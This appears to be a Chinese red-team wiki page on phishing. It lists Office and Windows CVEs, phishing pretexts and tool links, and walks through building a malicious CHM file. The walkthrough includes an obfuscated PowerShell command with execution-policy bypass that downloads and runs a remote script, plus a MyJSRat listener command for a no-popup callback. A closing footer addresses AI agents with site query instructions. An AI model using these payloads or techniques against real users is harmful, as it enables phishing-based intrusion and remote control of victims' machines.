# 钓鱼邮件 **邮件服务器搭建** ``` https://github.com/biggerduck/RedTeamNotes/blob/main/%E7%BA%A2%E9%98%9F%E5%9F%BA%E7%A1%80%E8%AE%BE%E6%96%BD%E4%B9%8B%E9%82%AE%E4%BB%B6%E6%9C%8D%E5%8A%A1%E5%99%A8%E6%90%AD%E5%BB%BA.pdf ``` **钓鱼邮件** ``` 假冒的内部域名 假冒的外部域名 近似域名 被黑账户 群发/特定发 虚构情景/恶意连接/恶意文件 ``` **CVE** **CVE-2017-11882** ``` Microsoft Office 2007 SP3 / 2010 SP2 / 2013 SP1 / 2016 ``` **CVE-2017-0199** ``` Microsoft Office 2007 SP3 / 2010 SP2 / 2013 SP1 / 2016,Vista SP2,Server 2008 SP2,Windows 7 SP1,Windows 8.1 ``` **CVE-2012-0158** ``` Microsoft Office 2003 SP3、2007 SP2和SP3,以及2010 Gold和SP1;Office 2003 Web组件SP3;SQL Server 2000 SP4、2005 SP4和2008 SP2,SP3和R2; BizTalk Server 2002 SP1;Commerce Server 2002 SP4、2007 SP2和2009 Gold和R2; Visual FoxPro 8.0 SP1和9.0 SP2; 和Visual Basic 6.0 ``` **CVE-2017-0143** ``` Microsoft Windows Vista SP2;Windows Server 2008 SP2和R2 SP1; Windows 7 SP1;Windows 8.1; Windows Server 2012 Gold和R2;Windows RT 8.1;Windows 10 Gold,1511和1607;以及 和Windows Server 2016 OFFICE文档/ PDF文件 ``` **可执行文件** **文档文件的伪造** **扩展名/图标** **捆绑** **宏** **0day** **CHM** ``` 使用编译的HTML文件加载恶意代码。 使用EasyCHM对html进行编译,在html文件中插入恶意代码。 使用MSF生成powershell格式的web_delivery模块 使用Rundll32配合MyJSRAT实施运行无弹窗 ``` ![image](https://raw.githubusercontent.com/xiaoy-sec/Pentest_Note/master/img/44.png) ``` 把命令base编码避免特殊符号 ``` ![image](https://raw.githubusercontent.com/xiaoy-sec/Pentest_Note/master/img/45.png) ``` 执行语句编码后 >powershell -ep bypass -enc JABCAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAOwAKACQAQgAuAHAAcgBvAHgAeQA9AFsATgBlAHQALgBXAGUAYgBSAGUAcQB1AGUAcwB0AF0AOgA6AEcAZQB0AFMAeQBzAHQAZQBtAFcAZQBiAFAAcgBvAHgAeQAoACkAOwAKACQAQgAuAFAAcgBvAHgAeQAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA9AFsATgBlAHQALgBDAHIAZQBkAGUAbgB0AGkAYQBsAEMAYQBjAGgAZQBdADoAOgBEAGUAZgBhAHUAbAB0AEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA7AAoASQBFAFgAIAAkAEIALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADAALgAxADAANwA6ADgAMAA4ADAALwBQAEsAUQBOAEUAYgAnACkAOwAKAA== 通过JSRat执行powershell上线命令 https://github.com/Ridter/MyJSRat >python MyJSRat.py -i 192.168.1.107 -p 8888 -c "powershell -ep bypass -enc JABCAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAOwAKACQAQgAuAHAAcgBvAHgAeQA9AFsATgBlAHQALgBXAGUAYgBSAGUAcQB1AGUAcwB0AF0AOgA6AEcAZQB0AFMAeQBzAHQAZQBtAFcAZQBiAFAAcgBvAHgAeQAoACkAOwAKACQAQgAuAFAAcgBvAHgAeQAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA9AFsATgBlAHQALgBDAHIAZQBkAGUAbgB0AGkAYQBsAEMAYQBjAGgAZQBdADoAOgBEAGUAZgBhAHUAbAB0AEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA7AAoASQBFAFgAIAAkAEIALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADAALgAxADAANwA6ADgAMAA4ADAALwBQAEsAUQBOAEUAYgAnACkAOwAKAA==" ``` ![image](https://raw.githubusercontent.com/xiaoy-sec/Pentest_Note/master/img/46.png) ``` 访问http://ip/wtf复制利用语句到html文件后编译 ``` ![image](https://raw.githubusercontent.com/xiaoy-sec/Pentest_Note/master/img/47.png) ``` ``` ![image](https://raw.githubusercontent.com/xiaoy-sec/Pentest_Note/master/img/48.png) ``` 正常打开CHM文件,无弹窗上线。 ``` ![image](https://raw.githubusercontent.com/xiaoy-sec/Pentest_Note/master/img/49.png) **LNK钓鱼** ``` https://github.com/Yihsiwei/Lnk-Trojan https://github.com/biggerduck/RedTeamNotes/blob/main/lnk%E9%92%93%E9%B1%BC%E6%A0%B7%E6%9C%AC%E7%9A%84%E5%88%B6%E4%BD%9C.pdf ``` **自动化批量化发送钓鱼邮件** ``` https://github.com/SkewwG/henggeFish ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://www.heresecurity.wiki/chu-shi-fang-wen/yu-cha-shi-gong-ji/diao-yu-you-jian.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.